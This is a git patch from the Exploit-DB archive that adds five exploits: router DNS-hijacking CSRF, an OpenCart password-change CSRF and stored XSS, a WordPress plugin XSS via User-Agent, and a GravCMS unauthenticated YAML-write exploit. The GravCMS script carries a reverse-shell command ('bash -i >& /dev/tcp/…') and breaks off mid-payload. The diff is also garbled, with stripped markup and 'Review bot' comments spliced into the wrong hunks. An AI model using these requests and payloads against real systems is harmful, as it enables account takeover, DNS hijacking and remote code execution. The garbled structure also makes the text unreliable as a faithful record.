From 83051cc8db640458bc56d444abcf4516488d38d0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 10 Jun 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-06-10 5 changes to exploits/shellcodes Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS) GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) --- exploits/hardware/webapps/49969.html | 22 +++++++++ exploits/php/webapps/49970.html | 73 ++++++++++++++++++++++++++++ exploits/php/webapps/49971.txt | 44 +++++++++++++++++ exploits/php/webapps/49972.txt | 19 ++++++++ exploits/php/webapps/49973.py | 28 +++++++++++ files_exploits.csv | 5 ++ 6 files changed, 191 insertions(+) create mode 100644 exploits/hardware/webapps/49969.html create mode 100644 exploits/php/webapps/49970.html create mode 100644 exploits/php/webapps/49971.txt create mode 100644 exploits/php/webapps/49972.txt create mode 100755 exploits/php/webapps/49973.py diff --git a/exploits/hardware/webapps/49969.html b/exploits/hardware/webapps/49969.html new file mode 100644 index 000000000..98ec5258c --- /dev/null +++ b/exploits/hardware/webapps/49969.html @@ -0,0 +1,22 @@ +# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) +# Date: 01/05/2021 +# Exploit Author: Rodolfo Mariano +# Version: Firmware 1.1.2-1.1.5 +# CVE: 2021-32403 + +# Exploit Code: + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49970.html b/exploits/php/webapps/49970.html new file mode 100644 index 000000000..a87346046 --- /dev/null +++ b/exploits/php/webapps/49970.html 
@@ -0,0 +1,73 @@
+# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
+# Date : 2021/08/06
+# Exploit Author : Mert Daş merterpreter@gmail.com
+# Software Link : http://www.opencart.com/index.php?route=download/download
+ : https://github.com/opencart
+# Software web : www.opencart.com
+# Tested on: Server : Xampp
+
+# Cross-site request forgery
+
+OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
+
+OpenCart is not using any security token to prevent it against CSRF.
+It is vulnerable to all location inside User panel.
+
+Header
+
+----------------------------------------------------------
+http://localhost/index.php?route=account/password
+
+POST /opencart/index.php?route=account/password HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
+Content-Length: 300
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/opencart/index.php?route=account/password
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="password"
+
+123asd!
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="confirm"
+
+123asd!
+-----------------------------3890527419799841332130342675--
+
+
+Response
+
+HTTP/1.1 302 Found
+Date: Tue, 08 Jun 2021 16:52:59 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
+Location: http://127.0.0.1/opencart/index.php?route=account/account
+Content-Length: 0
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+----------------------------------------------------------
+
+Simple Poc to change user Password
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49971.txt b/exploits/php/webapps/49971.txt
new file mode 100644
index 000000000..d650c1dd9
--- /dev/null
+++ b/exploits/php/webapps/49971.txt
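Review bot: The `# Date : 2021/08/06` header contradicts the captured response (`Date: Tue, 08 Jun 2021`) and the commit date of 2021-06-10; day and month look transposed and the line should read `# Date : 2021/06/08` (49971.txt carries the same slip). The header also lacks a `# Version:` field even though the title names 3.0.3.7, and lacks `# Vendor Homepage:`, which the other entries in this commit provide. The captured request carries `Origin: http://127.0.0.1` and a matching `Referer`, so it only shows that no anti-CSRF token is required, not that a cross-origin submission is accepted; the write-up should state that the 302 is also returned when those headers point to another origin, since Origin/Referer validation and SameSite session cookies are precisely the controls that would otherwise block this. The HTML of the PoC form is not visible in this view (markup appears stripped), so the form itself cannot be reviewed here.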
@@ -0,0 +1,44 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 2021/08/06
+# Exploit Author: Mert Daş
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.7
+# Tested on: Windows 10
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two.
+It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: ""
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST
+/opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 187
+Origin: http://127.0.0.1
+Connection: close
+Referer:
+http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+
+store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
\ No newline at end of file
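Review bot: The title names OpenCart 3.0.3.6 while the header says `# Version: 3.0.3.7`, and the request goes to `admin/index.php?route=marketing/contact/send` with a `user_token`, so the write-up should state plainly that planting the payload requires an authenticated administrator; the "Attack vector" paragraph currently reads as though any user could do it, which overstates the risk for anyone triaging this. `# Date: 2021/08/06` conflicts with the commit date of 2021-06-10 and looks like day and month transposed, as in 49970.html. The Steps-To-Reproduce list jumps from 3 to 5, and the payload line shows only `""` in this view (markup stripped), so the injected value is only recoverable from the `subject=` parameter in the request body. From the defender's side the fix is HTML-encoding the stored subject wherever the admin UI renders it.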
diff --git a/exploits/php/webapps/49972.txt b/exploits/php/webapps/49972.txt
new file mode 100644
index 000000000..5f1bcf4e3
--- /dev/null
+++ b/exploits/php/webapps/49972.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
+# Date: 09/06/2021
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
+# Software Link: https://wordpress.org/plugins/visitors-app/
+# Version: 0.3
+# Tested on: Debian GNU/Linux 10
+# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
+
+## Description:
+# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through
+# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
+# The 'user-agent' parameter allows attacker to escalate their privileges.
+
+## PoC
+# Replace google.com with malicious attacker page
+curl -i http://localhost/wordpress --user-agent ""
+
+# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
\ No newline at end of file
diff --git a/exploits/php/webapps/49973.py b/exploits/php/webapps/49973.py
new file mode 100755
index 000000000..6a47d177b
--- /dev/null
+++ b/exploits/php/webapps/49973.py
@@ -0,0 +1,28 @@
+# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
+# Original Exploit Author: Mehmet Ince
+# Vendor Homepage: https://getgrav.org
+# Version: 1.10.7
+# Tested on: Debian 10
+# Author: legend
+
+#/usr/bin/python3
+
+import requests
+import sys
+import re
+import base64
+target= "http://192.168.1.2"
+#Change base64 encoded value with with below command.
+#echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0
+payload=b"""/*
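Review bot: The description line `# The 'user-agent' parameter allows attacker to escalate their privileges.` asserts an impact the PoC does not demonstrate; what is shown is an unauthenticated request whose User-Agent is later rendered in the wp-admin "visitors" tab, so any further impact depends on what the injected script does in the administrator's session and should be worded as a possible consequence, not a property of the parameter. The comment `# Replace google.com with malicious attacker page` no longer matches the `curl` line, which shows an empty `--user-agent ""` in this view (markup appears stripped), so the two lines should be brought back into agreement. Minor wording on the same lines: "informations" → "information", "Wordpress" → "WordPress". For the defender the fix is escaping the stored header with `esc_html()` at render time, and the wpscan reference already given is the right place to track the fixed plugin version.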